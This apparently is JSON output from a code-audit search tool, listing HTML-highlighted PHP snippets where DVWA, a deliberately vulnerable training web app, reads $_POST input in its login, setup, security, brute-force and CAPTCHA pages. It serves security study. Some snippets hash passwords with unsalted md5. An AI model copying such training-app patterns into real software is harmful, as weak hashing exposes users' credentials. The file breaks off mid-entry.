punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 14,
"start": 9,
"end": 20,
"severity": "unknown",
"note": ""
},
{
"id": 45,
"file": "/home/chris/src/DVWA-master/login.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \n<span class=\"highlight\"><span class=\"line-number\">18:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \n<span class=\"line-number\">23:</span> \t<span class=\"token variable\">$query</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>\"<span class=\"token keyword\">SELECT</span> table_schema<span class=\"token punctuation\">,</span> table_name<span class=\"token punctuation\">,</span> create_time",
"line": 18,
"start": 13,
"end": 24,
"severity": "unknown",
"note": ""
},
{
"id": 52,
"file": "/home/chris/src/DVWA-master/security.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'DVWA Security'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page_id'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'security'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> <span class=\"token variable\">$securityHtml</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">13:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string\">'seclev_submit'</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"line-number\">15:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'security.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token variable\">$securityLevel</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {",
"line": 13,
"start": 8,
"end": 19,
"severity": "unknown",
"note": ""
},
{
"id": 53,
"file": "/home/chris/src/DVWA-master/security.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">13:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string\">'seclev_submit'</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">14:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"line-number\">15:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'security.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token variable\">$securityLevel</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">18:</span> \t<span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">20:</span> \t\t\t<span class=\"token variable\">$securityLevel</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t\t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t\t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">23:</span> \t\t\t<span class=\"token variable\">$securityLevel</span> <span class=\"token operator\">=</span> <span class=\"token string\">'medium'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 18,
"start": 13,
"end": 24,
"severity": "unknown",
"note": ""
},
{
"id": 56,
"file": "/home/chris/src/DVWA-master/setup.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'Setup'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page_id'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'setup'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"highlight\"><span class=\"line-number\">12:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'create_db'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"line-number\">14:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'setup.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$DBMS</span> <span class=\"token operator\">==</span> <span class=\"token string\">'MySQL'</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">17:</span> \t\tinclude_once DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'dvwa/includes/DBMS/MySQL.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 12,
"start": 7,
"end": 18,
"severity": "unknown",
"note": ""
},
{
"id": 70,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 71,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise password input\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 8,
"start": 3,
"end": 14,
"severity": "unknown",
"note": ""
},
{
"id": 72,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise password input\n<span class=\"highlight\"><span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Default</span> values",
"line": 13,
"start": 8,
"end": 19,
"severity": "unknown",
"note": ""
},
{
"id": 91,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 92,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token 